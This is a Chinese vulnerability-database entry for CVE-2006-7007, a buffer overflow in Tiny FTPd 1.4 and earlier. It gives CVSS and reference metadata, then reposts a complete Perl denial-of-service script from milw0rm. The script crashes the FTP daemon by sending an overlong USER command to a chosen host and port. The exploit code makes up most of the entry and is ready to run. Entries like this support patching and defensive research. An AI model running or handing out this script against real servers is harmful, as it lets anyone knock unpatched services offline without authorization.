Tiny FTPd 'USER'命令缓冲区溢出

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110222 漏洞类型 缓冲区溢出
发布时间 2006-05-06 更新时间 2007-02-12
CVE编号 CVE-2006-7007 CNNVD-ID CNNVD-200702-230
漏洞平台 Windows CVSS评分 7.8
|漏洞来源
https://www.exploit-db.com/exploits/1758
https://www.securityfocus.com/bid/87013
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-230
|漏洞详情
TinyFTPd1.4版本及其早期版本中存在缓冲区溢出。远程攻击者可以借助一个超长的USER指令,造成拒绝服务(后台程序崩溃),该向量不同于CVE-2000-0133。
|漏洞EXP
#!/bin/perl
#
# Title: TinyFTPD <= 1.4 USER command D.O.S
# Credits: [Oo]
#
#
use IO::Socket;

print "[i] TinyFTPD <= 1.4 USER command D.O.S\n";
print "[i] coded by [Oo]\n";


if (@ARGV < 2)
{
 print "\n[*] Usage: tinyftpd_dos.pl host port\n";
 print "[*] Exemple: tinyftpd_dos.pl 192.168.0.1 21\n";
 exit;
}


$ip = $ARGV[0];
$port = $ARGV[1];

$exploit = "(A" x 9000;

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "\n[-] Connecting: Failed!\n";
print "\n[+] Connecting: Ok!\n";
print "[+] Sending bad request...\n";

print $socket "USER $exploit\n";
sleep(5);
close($socket);

print "[?] DoSed?\n";

# milw0rm.com [2006-05-06]
|受影响的产品
H. Nomura Tiny Ftpd 1.4
|参考资料

来源:MISC
链接:http://www.securiteam.com/exploits/5LP032KIKC.html
来源:MISC
链接:http://www.ph4nt0m.org/bbs/showthread.php?threadid=30080&goto=nextnewest
来源:OSVDB
名称:25767
链接:http://www.osvdb.org/25767
来源:MILW0RM
名称:1758
链接:http://www.milw0rm.com/exploits/1758